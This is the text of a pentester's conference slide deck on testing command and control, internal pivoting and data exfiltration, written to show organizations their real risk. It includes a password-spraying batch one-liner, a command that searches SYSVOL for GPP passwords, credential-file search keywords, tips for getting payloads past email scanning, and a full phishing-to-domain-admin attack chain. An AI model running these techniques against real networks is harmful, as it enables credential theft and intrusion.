Beyond the Pentest

How C2, Internal Pivoting, and Data Exfiltration Show True Risk

Beau Bullock

Beyond the PentestWhat does a standard internal network pentest already cover?

Port scans

Vulnerability scanning

Manual validation

Provide recommendations

What is Wrong With ThisAttackers don’t vulnerability scan - too noisy

Misses some very critical vulnerabilities

Doesn’t account for domain systems already compromised

whoamiBeau Bullock

Pentester at Black Hills Information Security

Host of Hack Naked TV

Previously an enterprise defender

OSCP, GXPN, GPEN, GCIH, GCFA, OSWP and GSEC

What Are We Missing

Three major things

Command and Control

Internal Pivoting

Data Exfiltration

How Do We Test TheseStart with the basics

Standard domain user account

Lowest level of access typically provisioned

Standard system build

Anyone on leave? Steal their system

Standard network access

Command and Control

Command and ControlThree focus areas

Payload delivery

Email, web, etc.

Client-based protections

AV, application whitelisting, HIDS, etc.

Network-based protections

Egress filtering, IDS/IPS, inline payload detonation

C2: Payload DeliveryWhat can be emailed to your employees?

Executable

PDF

Word DOC or XLS w/ macro

Batch file

Encrypted ZIP

Extensionless files?

C2: Payload DeliveryProtip:

Many webmail services scan attachments for malware

Some don’t allow EXE’s altogether

Yahoo’s MTA does not scan, and allows EXE’s

Use a third-party mail client to send through Yahoo

C2: Payload Delivery

What can be downloaded?

How about browser or Java or Adobe exploits?

Are users allowed to insert USB drives?

C2: Client-Based Protections

Did anything detect the payload after entry?

Anti-Virus

Application whitelisting

SIEM alerts

C2: Client-Based Protections

Payload types

Non-encoded EXE

Encoded EXE

ShellCode injection

Word Doc w/ macro

Software exploit

Physical access (rubber ducky)

C2: Client-Based Protections

Bypassing Client-based protections

Veil-Evasion

Framework for creating custom malware

PowerSploit

Shellcode injection directly into memory

Obfuscation

C2: Network-Based Protections

Was the C2 channel detected?

Firewall block

IDS/IPS detection

Inline Detonation

C2: Network-Based Protections

What does an outbound portscan reveal?

open.zorinaq.com

Weak egress filtering provides more legroom for C2

DLP might miss items not sent over standard ports

C2: Some Typical C2 Channels

Standard TCP

HTTP/HTTPS

DNS

ICMP

C2: C2 Through A Web Proxy

Meterpreter Reverse_https

Uses proxy settings on system

PowerShell Empire!!!

Same as above but in PowerShell

Appears as web traffic through your web proxy

C2: C2 Over Social Media

Can your users get to any social media sites?

Twittor - Uses Twitter direct messages as a C2 channel

GCAT - Uses Gmail as a C2 channel

Sneaky-Creeper - Uses Twitter, Tumblr, and Soundcloud as a C2 channel

C2: C2 over DNS

DNScat

Tunnels traffic through DNS requests

C2 channel through NS Records

C2 even with EVERY port blocked outbound from the client

https://github.com/iagox86/dnscat2

C2: C2 over ICMP

Invoke-PowerShellICMP

Tunnels traffic through ICMP echo-requests and echo-replys

ICMP is commonly allowed through firewalls

https://github.com/samratashok/nishang/tree/master/Shells

Internal Pivoting

Internal Pivoting

Use built-in tools as a low level user to compromise a network

No vuln scans needed

Less noise

Escalate privileges; locate sensitive data

Pivot: GPP PasswordsMay 13, 2014 – MS14-025

Passwords of accounts set by GPP are trivially decrypted!

…by ANY authenticated user on the domain

Located in groups.xml files on SYSVOL

https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspxhttp://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspxhttps://dirteam.com/sander/2014/05/23/security-thoughts-passwords-in-group-policy-preferences-cve-2014-1812/

Pivot: GPP PasswordsFirst thing I check for on an internal assessment

Almost always find an admin password here

Find it with:

PowerSploit - Get-GPPPassword

Metasploit GPP Module

Or…C:>findstr /S cpassword %logonserver%\sysvol\*.xml

Pivot: Privilege EscalationLocal privilege escalation

Are we already a local admin?

PowerUp

Invoke-AllChecks looks for potential privilege escalation vectors

http://www.verisgroup.com/2014/06/17/powerup-usage/

Pivot: Misconfigured Systems

Occasionally, admins get lazy… and do things like add “Domain Users” group to the “Local Administrators” group

Pivot: Misconfigured Systems

This means EVERY domain user is now is an administrator of that system

Veil-PowerView Find-LocalAdminAccess

Veil-PowerView Invoke-ShareFinder

http://www.harmj0y.net/blog/penetesting/finding-local-admin-with-the-veil-framework/

Pivot: Password Spraying

Domain locks out accounts after a certain number of failed logins

Can’t brute force

Solution:

Try a number of passwords less than the domain lockout policy against EVERY account in the domain

Pivot: Password SprayingLockout Policy = Threshold of five

Let’s try one password across every account

What passwords do we try?

Password123

Companyname123

SeasonYear

C:\>@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL

Pivot: Password Spraying

Pivot: LLMNR & NBTNS Poison

LLMNR = Link-Local Multicast Name Resolution

NBT-NS = NetBIOS over TCP/IP Name Service

Both help hosts identify each other when DNS fails

Pivot: LLMNR & NBTNS Poison

http://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning

Pivot: LLMNR & NBTNS Poison

SpiderLabs Responder

Inveigh PowerShell Script

The result is that we obtain NTLM challenge/response hashes

Crack hashes

https://www.trustwave.com/Resources/SpiderLabs-Blog/Introducing-Responder-1-0/

Sensitive Data Hunt

Sensitive Data: Info Disclosure on Shares

Sensitive files on shares?

Find them with PowerView

ShareFinder then FileFinder

FileFinder will find files with the following strings in their title:

‘*pass*’, ‘*sensitive*’, ‘*admin*’, ‘*secret*’, ‘*login*’, ‘*unattend*.xml’, ‘*.vmdk’, ‘*creds*’, or ‘*credential*’ 

Sensitive Data: Locate RDP Jump Hosts

Where are users RDP’ing to?

Can provide insight into where critical systems are

Get-NetComputers | Get-NetRDPSessions | Export-Csv –NoTypeInformation rdpsessions.csv

http://www.harmj0y.net/blog/powershell/powerquinsta/

Sensitive Data: Virtualization Hypervisors

Data Exfiltration

Data ExfiltrationWhat are organizations concerned about leaving their networks? 

PCI data

Patient health information

Personally Identifying Information

Intellectual property

Data Exfiltration

How can attackers get data out of your network? 

Email

Web Access

USB Drive

Photo

Data Exfil: Email

For email is DLP being enforced on the following?

Cleartext in email body

Encoded in email body

Attachments

Optical Character Recognition

Data Exfil: Web

Is all web traffic subject to DLP inspection?

Same types of tests as email are performed but tracking over standard and non-standard web ports

Data Exfil: USB Drives

Are files allowed to be copied to a USB drive?

Encryption

DLP

Blocked completely

Putting It All Together

Attack ScenarioTarget Organization Setup

Firewall only allows outbound traffic through web proxy

AV up to date on clients

Email gateway allows Doc files

Local Administrator account is widespread with same credentials

Attack Scenario

Phishing email is crafted with Word doc attachment

Word doc is weaponized with a Macro

Email is sent to target employee

Attack ScenarioEmployee opens email

Downloads attached .doc

Enables content

Macro runs PowerSploit PowerShell script to inject Meterpreter Reverse_https into memory

Meterpreter C2 channel is established

Attack Scenario

Password spray from the command line

Spring2016?

Run Find-LocalAdminAccess to find where the users are local admin

Pivot using psexec

Attack ScenarioAttacker dumps local user hashes (including local admin)

Local administrator credential is not randomized

Using PowerView UserHunter the attacker finds where Domain Admins are located

Attack ScenarioAttacker pivots to DA workstation

Runs Mimikatz to dump creds from memory

Locates sensitive data with PowerView ShareFinder

Exfils data

Summary

Summary

What are the benefits of this style of testing?

Real test of detection and incident response

Shows how an attacker can go from low access to owning the environment

Shows true risk to the organization

Thank You!

beau@blackhillsinfosec.com

beau@dafthack.com

@dafthack